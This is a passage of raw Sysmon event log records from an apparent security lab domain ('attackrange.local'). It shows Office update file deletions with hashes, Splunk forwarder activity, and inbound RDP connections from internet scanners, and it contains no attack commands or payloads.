Shared\OFFICE16\DataModel\System.Spatial.dllMD5=C33E5FB594711554F43FF98718522DB3,SHA256=EC6E61D51D70F7BCA922CB25E44FFD01D06FCB5A2A00FDBB6F5FF95698F01ACF,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000070913Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:42.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\msolap_xl.dllMD5=43850F6AD2C13630985753BB0E14DBF0,SHA256=CC16377214BDAFE734F7D720660ED304829A7A0FFC1C2F04F507129B6F49238C,IMPHASH=7E7488AB216BC4FDE994B3C59ACD5C47truetrue 23542300x800000000000000070912Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:42.735{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\msmgdsrv_xl.dllMD5=4F8AD7A18C351C62C86F1284A433A82A,SHA256=8FBCB6FB2243A11860C5C45F9C3D1EE065C771DE01966A81A881D19D80C6CCBD,IMPHASH=AFE253D14FC29867B6523151559E9A40truetrue 23542300x800000000000000070911Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:42.704{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=53D478FF0E4760ED14B9166139418975,SHA256=11F2B3DE94E65135ECC2A46E77B3C7A8213024959925033BD3652807F6DD37A2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000070910Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.626{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50886-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000070909Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:42.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\msmdlocal_xl.dllMD5=02DABF31D4E9B14BB2BBC5187822E1C7,SHA256=361584E276CE9B32C856629858EECFC46D5F0B8EEBE643AA497C8C3335AF56F7,IMPHASH=346BA8C418D343AC215C759AE757878Atruetrue 23542300x800000000000000070908Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:42.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.SqlServer.Configuration.SString.dllMD5=EDCC48F67F5084299905CA7E9D02688E,SHA256=9A77880A54B39CCF320E64B1CE0B952F765D9DF16287549C16C53FC23DAF3F15,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000070907Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:42.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Office.Excel.DataModel.dllMD5=835F377A84053357F35540CF7BCE80CC,SHA256=0F02BBC479F23FD959C74E98AEAB1E8A3CBFDE8706BFDC800F374A06474C7F7D,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 354300x800000000000000049804Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:40.766{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com53275-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049803Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:40.630{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52502-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049802Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:40.000{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58721-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049801Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:42.257{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F582B81A546725CF10F83A239B55924A,SHA256=B839683122D8A5590652C8A17D25430F2FA4FF7F3FAF8498DEA6EB71DC856400,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049800Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:42.101{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6C7D90BD3AFFE6A9EDA0EA22FA5FD48,SHA256=7699663AB367024B11262243DD650954AE51123E11EB118E603FBC2E7BF21423,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070984Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\mfc140u.dllMD5=C6A732F23B907BC6D37982F47F4B4453,SHA256=C8DAB45709404E6607B21A641895C6B6953550780B2245C3792E64244A10DA8E,IMPHASH=D774F0CF6BA79D3B787D3AE2DC21DC54truetrue 23542300x800000000000000070983Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.813{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\IACOM2.DLLMD5=F7198C4DD281C561AA90078B019EC21F,SHA256=10C9DA0B5D972E65D4E1D09E6FBFDCD677A15C3615C4ACA44C931994B6F0BF9D,IMPHASH=023F4F9091C4F0FB61D776AA24D0A11Atruetrue 23542300x800000000000000070982Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.782{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\HeartbeatConfig.xmlMD5=59F881B9ABF086EBCF9E73016A4E9A14,SHA256=D8906306438AC5FA23ED5ECD3764FBEBF94FC7748ECC96CC1C12BF8ECD7F67F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070981Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.782{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXEMD5=3C71BA871B9FE151957F57FDA5CCD214,SHA256=9FB380F5B780087171591983658EFD5492C3DC2983D49D60D2299D78699759D7,IMPHASH=A9FC6735EF378E18384CA064CBC98485truetrue 23542300x800000000000000070980Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\EXP_XPS.DLLMD5=3055DB43306D244314921DFFFC1BE7A7,SHA256=16C0FA5B1D0639048544E1F239780E3F0C8BE5CC45BC628BF86A40901EF8C8B3,IMPHASH=1EC2B312A8A72B399643A891E20954FFtruetrue 23542300x800000000000000070979Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\EXP_PDF.DLLMD5=18BDBE86481D5DEAF090790767971CBE,SHA256=36AF05E1EB5EDD4470480780F1B92FF0CE3E9BEA6BCBA6404B9CE2690329A2D8,IMPHASH=281C7E66CB03A1B2A07E7AD8CB678EA4truetrue 23542300x800000000000000070978Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\EXPSRV.DLLMD5=A9EFA34679D7DBA36961E128726F37FC,SHA256=B46D4C8D093C6531F00590532900A21D057551AE981012A21168C2B1FFA04B2A,IMPHASH=C0625F3A81A958440A339CA5825DF190truetrue 23542300x800000000000000070977Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Csi.dllMD5=7365ED955AF4B6E189F2AAF740898329,SHA256=AA3C888C3F5DA0854998EEAA812E89FC54CB16F13E970F3B28B01B7F4FBE66C8,IMPHASH=877CC27CA1C468EC25361E899E48B25Dtruetrue 23542300x800000000000000070976Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\concrt140.dllMD5=EB42B164D603672E07997019BB00E4AD,SHA256=DABDB0732B2FC14040CEDBBFD369D9EB3C7A2E66B38A79892E1C05E6D6A8526D,IMPHASH=E29B9617328962A9B58721E88E2FD959truetrue 23542300x800000000000000070975Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-utility-l1-1-0.dllMD5=F440DC5623419E013D07DD1FCD197156,SHA256=BBA068F29609630E8C6547F1E9219E11077426C4F1E4A93B712BFBA11A149358,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070974Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-time-l1-1-0.dllMD5=05AF3F787A38ED1974FF3BDA3D752E69,SHA256=F4163CBC464A82FCE47442447351265A287561C8D64ECC2F2F97F5E73BCB4347,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070973Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-string-l1-1-0.dllMD5=3A96F417129D6E26232DC64E8FEE89A0,SHA256=01E3C0AA24CE9F8D62753702DF5D7A827C390AF5E2B76D1F1A5B96C777FD1A4E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070972Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-stdio-l1-1-0.dllMD5=53E23E326C11191A57DDF7ADA5AA3C17,SHA256=293C76A26FBC0C86DCF5906DD9D9DDC77A5609EA8C191E88BDC907C03B80A3A5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070971Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-runtime-l1-1-0.dllMD5=C25321FE3A7244736383842A7C2C199F,SHA256=BF55134F17B93D8AC4D8159A952BEE17CB0C925F5256AA7F747C13E5F2D00661,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070970Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-process-l1-1-0.dllMD5=E18FD20E089CB2C2C58556575828BE36,SHA256=B06B2D8C944BFF73BD5A4AAD1CAD6A4D724633E7BD6C6B9E236E35A99B1D35F2,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070969Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-private-l1-1-0.dllMD5=B4BE272187CB85E719DFB5BF48BB9B1B,SHA256=CCAF41E616B9A872D35C8083CBF8FDC14371FA3EF159FE699514643C26A4EBF3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070968Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-multibyte-l1-1-0.dllMD5=FF4DE9CE85C4B01312DF6E3CDD81B0FF,SHA256=D7E676B9F1E162957D0549AB0B91E2CD754643490B0654BF9A86AA1E77CB3C37,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070967Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-math-l1-1-0.dllMD5=877C5FF146078466FF4370F3C0F02100,SHA256=9B05A43FDC185497E8C2CEA3C6B9EB0D74327BD70913A298A6E8AF64514190E8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070966Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-locale-l1-1-0.dllMD5=0D50A16C2B3EC10B4D4E80FFEB0C1074,SHA256=FAB41A942F623590402E4150A29D0F6F918EE096DBA1E8B320ADE3EC286C7475,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070965Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-heap-l1-1-0.dllMD5=5D409D47F9AEBD6015F7C71D526028C3,SHA256=7050043B0362C928AA63DD7800E5B123C775425EBA21A5C57CBC052EBC1B0BA2,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070964Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-filesystem-l1-1-0.dllMD5=D76F73BE5B6A2B5E2FA47BC39ECCDFE5,SHA256=6C86E40C956EB6A77313FA8DD9C46579C5421FA890043F724C004A66796D37A6,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070963Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-environment-l1-1-0.dllMD5=FE93C3825A95B48C27775664DC54CAE4,SHA256=C4ED8F65C5A0DBF325482A69AB9F8CBD8C97D6120B87CE90AC4CBA54AC7D377A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070962Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-convert-l1-1-0.dllMD5=AFC20D2EF1F6042F34006D01BFE82777,SHA256=CD5256B2FB46DEAA440950E4A68466B2B0FF61F28888383094182561738D10A9,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070961Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-conio-l1-1-0.dllMD5=E3D0F4E97F07033C1FEAF72362BBB367,SHA256=3067981026FAD83882F211BFE32210CE17F89C6A15916C13E62069E00D5A19E3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070960Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-xstate-l2-1-0.dllMD5=42DC903598FF9D2BFB92D3F1F1563A92,SHA256=583BE047AA83CCE2E8950F5F550DABC5F7CB5957860316E3F409BFAFB10B963C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070959Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-timezone-l1-1-0.dllMD5=BDD63EA2508C27B43E6D52B10DA16915,SHA256=7D4252AB1B79C5801B58A08CE16EFD3B30D8235733028E5823F3709BD0A98BCF,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070958Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-synch-l1-2-0.dllMD5=B9BC664A451424342A73A8B12918F88D,SHA256=0C5C4DFEA72595FB7AE410F8FA8DA983B53A83CE81AEA144FA20CAB613E641B7,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070957Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-processthreads-l1-1-1.dllMD5=247061D7C5542286AEDDADE76897F404,SHA256=CCB974C24DDFA7446278CA55FC8B236D0605D2CAAF273DB8390D1813FC70CD5B,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070956Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-localization-l1-2-0.dllMD5=6B4F2CA3EFCEB2C21E93F92CDC150A9D,SHA256=B39A515B9E48FC6589703D45E14DCEA2273A02D7FA6F2E1D17985C0228D32564,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070955Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-file-l2-1-0.dllMD5=ADB3471F89E47CD93B6854D629906809,SHA256=355633A84DB0816AB6A340A086FB41C65854C313BD08D427A17389C42A1E5B69,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070954Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-file-l1-2-0.dllMD5=19DF2B0F78DC3D8C470E836BAE85E1FF,SHA256=BD9E07BBC62CE82DBC30C23069A17FBFA17F1C26A9C19E50FE754D494E6CD0B1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070953Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 